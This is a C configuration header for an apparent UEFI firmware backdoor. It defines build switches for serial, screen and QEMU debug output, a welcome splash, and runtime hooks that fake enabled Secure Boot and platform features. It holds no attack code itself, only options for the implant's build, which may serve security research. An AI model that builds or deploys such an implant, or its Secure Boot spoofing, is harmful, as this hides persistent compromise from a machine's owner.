
#ifndef _CONFIG_H_
#define _CONFIG_H_

/*
    Enable debug output generated by DbgMsg() function.
    See src/debug.c for more details.
*/
#define BACKDOOR_DEBUG

/*
    Write debug messages into the ttyS0 using 0x3F8 I/O port.
*/
#define BACKDOOR_DEBUG_SERIAL

/*
    Show welcome screen on backdoor init using UEFI simple
    text output protocol.
*/
#define BACKDOOR_DEBUG_SPLASH

/*
    Hook EFI runtime functions in order to emulate enabled Secure Boot
    and platform features.
*/
#define BACKDOOR_RUNTIME_HOOKS

/*
    Write debug messages to the screen using UEFI simple
    text output protocol.
*/
// #define BACKDOOR_DEBUG_SCREEN

/*
    Write debug messages into the OVMF debug output port.
    Uncomment this option if you're planning to run backdoor on QEMU.
*/
// #define BACKDOOR_DEBUG_OVMF

/* 
    Serial port configuration for BACKDOOR_DEBUG_SERIAL
*/
#define SERIAL_BAUDRATE 115200
#define SERIAL_PORT_NUM SERIAL_PORT_1

#endif
